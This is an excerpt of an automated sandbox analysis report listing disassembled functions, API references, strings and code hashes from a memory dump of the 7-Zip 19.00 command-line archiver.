Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
Instruction ID: 6c31386974d6953ccf4a744f9024ae214ebb91a54dcfca27f4c7fd98042c23e0
Opcode Fuzzy Hash: 7339f14c52790c104396c75c90f75acb671024a89b4c5f409cc22bad2f54e61d
Instruction Fuzzy Hash: DA919B33319A4086CB20DF25E49075EB374F7C2BA4F919616EA9E47768DF78C845CB90

Function 009A13E8 Relevance: 12.6, APIs: 10, Instructions: 133COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A1569
free.MSVCRT ref: 009A1574
free.MSVCRT ref: 009A157D
free.MSVCRT ref: 009A1588
free.MSVCRT ref: 009A1596
free.MSVCRT ref: 009A15BA
free.MSVCRT ref: 009A15C3
free.MSVCRT ref: 009A15D1
free.MSVCRT ref: 009A15DC
free.MSVCRT ref: 009A2D73

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
Instruction ID: f85d903984dc3de1e8721747d931c574b4796a7b41ebe68438195bb039a8468c
Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
Instruction Fuzzy Hash: 12514967219AC485CA20DF2AE49079E7765F7CAF88F409012DF8E67B29CF39C456CB14

Function 009A16B2 Relevance: 12.6, APIs: 10, Instructions: 125COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A17E2
free.MSVCRT ref: 009A17ED
free.MSVCRT ref: 009A17F6
free.MSVCRT ref: 009A1801
free.MSVCRT ref: 009A180F
free.MSVCRT ref: 009A1838
free.MSVCRT ref: 009A1841
free.MSVCRT ref: 009A184F
free.MSVCRT ref: 009A185A
free.MSVCRT ref: 009A2D73

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
Instruction ID: e1febf03976fb56f5adc4ba450fc5901128d7b0c7ea4dcd527e116f44113bc11
Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
Instruction Fuzzy Hash: 5C41F4B7219F8482CA24DF2AE8903AE6365FBCAF94F459422DB4E53725DF38C495C304

Function 009B6A20 Relevance: 12.6, APIs: 10, Instructions: 59COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B6A33
free.MSVCRT ref: 009B6A65
free.MSVCRT ref: 009B6A6D
free.MSVCRT ref: 009B6A7D
free.MSVCRT ref: 009B6A89
free.MSVCRT ref: 009B6ABB
free.MSVCRT ref: 009B6AC3
free.MSVCRT ref: 009B6AD3
free.MSVCRT ref: 009B6ADF
free.MSVCRT ref: 009B6AEB

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
Instruction ID: 696a441aae0ba3f8b687462bc6f06e70cdd0314230ea1426b938ee9ebc196d87
Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
Instruction Fuzzy Hash: A911462361688488CB11AF27DD513E86225EBC6FA8F5D8176AF2D2B359DE24D8428360

Function 0097FC9C Relevance: 12.5, APIs: 10, Instructions: 44COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097FCBA
free.MSVCRT ref: 0097FCC3
free.MSVCRT ref: 0097FCCC
free.MSVCRT ref: 0097FCD5
free.MSVCRT ref: 0097FCDE
free.MSVCRT ref: 0097FCE7
free.MSVCRT ref: 0097FCF0
free.MSVCRT ref: 0097FCF8
free.MSVCRT ref: 0097FD00
memmove.MSVCRT ref: 0097FD1E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
Instruction ID: 71dc30ebb368094b37d0fa142afdb208ac9e6e4a62e8d765ee3e7e1fd6273744
Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
Instruction Fuzzy Hash: D8010C2332594492CA14EF27DE9166C7320FBC5F947848162AF2E4BB65DF20D866C364

Function 009A6528 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A66B0

Strings

z, xrefs: 009A6594
/, xrefs: 009A65EB
a, xrefs: 009A6589
\, xrefs: 009A65E5

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: /$\$a$z
API String ID: 1294909896-3795456795
Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
Instruction ID: d6482d6331336b4bcdb5ecfa498b136f07dfc310ef93dae12e89c160dd21e333
Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
Instruction Fuzzy Hash: 90410383E0024499DB30EF21D4046B93768F353B98F8D5226EB95033A4EB79C9C5D7C1

Function 009B870C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B8785
fputs.MSVCRT ref: 009B8795
free.MSVCRT ref: 009B87E7
free.MSVCRT ref: 009B87EF
free.MSVCRT ref: 009B8801

Strings

Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 009B878E
7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 009B877E

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$fputs
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
API String ID: 2444650769-4238946813
Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
Instruction ID: 6af0becd12f8ea623219337dd981319d34fe0169119b96d689dbcfc55ac5a89e
Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
Instruction Fuzzy Hash: F02193637156C195DA309B25FAC43EAB325F789B94F988822CA4E97719CF3CC885CB00

Function 009BE3E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 009BE3EF
GetProcAddress.KERNEL32 ref: 009BE3FF
GetModuleHandleA.KERNEL32 ref: 009BE413
GetProcAddress.KERNEL32 ref: 009BE423

Strings

FindFirstStreamW, xrefs: 009BE3F5
FindNextStreamW, xrefs: 009BE419
kernel32.dll, xrefs: 009BE3E8, 009BE405

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
API String ID: 1646373207-4044117955
Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
Instruction ID: ca2d1de052fb115b2530cdb423af226626b1c42ef97a368a6cd5fac8ae4991a0
Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
Instruction Fuzzy Hash: 06E07EA8641A0691EE08DB59FEB935433B0F749B61F804036C42E03322EF3C825AC700

Function 00974F24 Relevance: 11.4, APIs: 9, Instructions: 111COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00974FB9
free.MSVCRT ref: 00974FC1
memmove.MSVCRT ref: 00974FDC
free.MSVCRT ref: 00975033
free.MSVCRT ref: 0097503B
free.MSVCRT ref: 00975049

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
Instruction ID: 86fefaa32f3389e74c0a184fed1858a540759af05e7afdb8c7b757d6e5cd7137
Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
Instruction Fuzzy Hash: DD31DA63728E8082DA50DF27D49026D6714BBD6FE4B48C221FF6E1B79ACF69C402C750

Function 00990554 Relevance: 11.4, APIs: 9, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 009796AC: free.MSVCRT ref: 009796D1

free.MSVCRT ref: 009905FD
free.MSVCRT ref: 00990607
free.MSVCRT ref: 00990612
free.MSVCRT ref: 00990639
free.MSVCRT ref: 00990643
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00992160), ref: 00990652
free.MSVCRT ref: 00990673
free.MSVCRT ref: 00990692
free.MSVCRT ref: 009906BC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ErrorLast
String ID:
API String ID: 408039514-0
Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
Instruction ID: 1e2d2acc7a3546737e2c62eced459c59673449eb94ba2cc1ac68f500605845e2
Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
Instruction Fuzzy Hash: F131B5232285808BCB30DF29E89025EB760F7C5794F845225EBAE87B65DF39D855CB00

Function 009AEAD4 Relevance: 11.3, APIs: 9, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009AEAFF
memcmp.MSVCRT ref: 009AEB1D
memcmp.MSVCRT ref: 009AEB33

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
Instruction ID: ad026c3a55f9e831a627284225dc9fd0234a37a1fd57e2d73672a5038721eb9d
Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
Instruction Fuzzy Hash: 28317CA130C70091FB08DF2B99593E82329DB86FE4F949461EE0697607EF78CE45C394

Function 009A29F7 Relevance: 11.3, APIs: 9, Instructions: 52COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A2A09
free.MSVCRT ref: 009A2A13
free.MSVCRT ref: 009A2A1E
free.MSVCRT ref: 009A2A2C
free.MSVCRT ref: 009A2A4E
free.MSVCRT ref: 009A2A57
free.MSVCRT ref: 009A2A65
free.MSVCRT ref: 009A2A70
free.MSVCRT ref: 009A2D73

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
Instruction ID: 1ccbdbb168a44e2e265176b4cc9ec5bb58ad2786948d69e7603c32b662dee03e
Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
Instruction Fuzzy Hash: 75012C6326E58045CA11FB33E85276E6311F7C3B91F8490A2AF4E13711CE38C447C214

Function 009A3677 Relevance: 11.3, APIs: 9, Instructions: 48COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A367E
free.MSVCRT ref: 009A3688
free.MSVCRT ref: 009A3693
free.MSVCRT ref: 009A36A1
free.MSVCRT ref: 009A36C8
free.MSVCRT ref: 009A36D1
free.MSVCRT ref: 009A36DF
free.MSVCRT ref: 009A36EA
free.MSVCRT ref: 009A36F8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
Instruction ID: 7760b76787ff6c8b7ea92efc904fa4bfff02094f76fae14d3f29e8f96562d4e1
Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
Instruction Fuzzy Hash: FB01EC6326A58045CA11FF37E46276E6310FBC7F91F8190A2AF4E53721CE38C487C628

Function 009B68FC Relevance: 11.3, APIs: 9, Instructions: 45COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B692E
free.MSVCRT ref: 009B6937
free.MSVCRT ref: 009B6940
free.MSVCRT ref: 009B6949
free.MSVCRT ref: 009B6952
free.MSVCRT ref: 009B695B
free.MSVCRT ref: 009B6964
free.MSVCRT ref: 009B696D
free.MSVCRT ref: 009B6975

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
Instruction ID: 3e767498fb92d1a8397a1d49ea4a94f775f26027c71899a3f62a1be292d41d97
Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
Instruction Fuzzy Hash: F501DA6372598489CA10EF77DD912A82324BBC6BA87988171BF1D4B755DE24CC52C364

Function 0097F0C8 Relevance: 11.3, APIs: 9, Instructions: 44COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097F0FA
free.MSVCRT ref: 0097F103
free.MSVCRT ref: 0097F10C
free.MSVCRT ref: 0097F115
free.MSVCRT ref: 0097F11E
free.MSVCRT ref: 0097F127
free.MSVCRT ref: 0097F130
free.MSVCRT ref: 0097F139
free.MSVCRT ref: 0097F141

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
Instruction ID: 7eb400d4a67363cbec1d22c301736ed89b5d470340abc617f0ab7717fdf9f0e1
Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
Instruction Fuzzy Hash: 2F011A636259808ACB10BF37DC912682724BBC6B98B988171BF2D4B755DE60C842C364

Function 009BC844 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BC91C
fputs.MSVCRT ref: 009BC9F1

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

fputs.MSVCRT ref: 009BCADA

Part of subcall function 009722E4: fflush.MSVCRT ref: 009722EB

Strings

ERRORS:, xrefs: 009BC8ED, 009BC915
WARNINGS:, xrefs: 009BC9C2, 009BC9EA
ERROR: , xrefs: 009BCAD3

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free$fflushfputcmemset
String ID: ERROR: $ERRORS:$WARNINGS:
API String ID: 2975459029-4064182643
Opcode ID: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
Instruction ID: 8ff857391ebc9fb058d7a2faefccfbc65761e33e2f6c7a836d32a098fafc4583
Opcode Fuzzy Hash: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
Instruction Fuzzy Hash: CF615EA37106859ADE38EB72E6913AE7325F785FD0F488026DF5F0B602DF28D8958350

Function 009A5680 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 181COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A5737
free.MSVCRT ref: 009A5907
free.MSVCRT ref: 009A5911

Strings

Junction: , xrefs: 009A5707
REPARSE:, xrefs: 009A57DF
..., xrefs: 009A58F2
: , xrefs: 009A574A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: : $...$Junction: $REPARSE:
API String ID: 1294909896-1476144188
Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
Instruction ID: 6019fd060a11d8a10a672d01d9825e1a3d14b1ddd0c7001c21d4a1a0275f60d5
Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
Instruction Fuzzy Hash: 6B510233310A0492DB20EF26E8427AA7765FBC27A4F85D022EA8B5B755DF7CC545CB90

Function 009B0E6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 009B0E9C

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

fputs.MSVCRT ref: 009B0F5D
fputs.MSVCRT ref: 009B0FD8
fputs.MSVCRT ref: 009B0FF4
LeaveCriticalSection.KERNEL32 ref: 009B1092

Strings

???, xrefs: 009B0EC3

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$CriticalSection$EnterLeavefreememmove
String ID: ???
API String ID: 2578255354-1053719742
Opcode ID: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
Instruction ID: 1b8014e37070e14f6539c1adfa49facf04b04175a37496ffc3f000bd03ac53ab
Opcode Fuzzy Hash: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
Instruction Fuzzy Hash: F2516172310A81A2EB68EF25DB543EE6320F784BA4F848516DF2D07761DF38D5A5C300

Function 009B0C64 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 009B0C95
fputs.MSVCRT ref: 009B0CF7
fputs.MSVCRT ref: 009B0D23
LeaveCriticalSection.KERNEL32 ref: 009B0E38

Strings

with the file from archive:, xrefs: 009B0D1C
Would you like to replace the existing file:, xrefs: 009B0CF0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CriticalSectionfputs$EnterLeave
String ID: Would you like to replace the existing file:$with the file from archive:
API String ID: 3346953513-686978020
Opcode ID: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
Instruction ID: 8cf6af55c0a9a2b34ecf56cad10b1d23ec7f8ccfcbabd83a50c311ca62b1a013
Opcode Fuzzy Hash: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
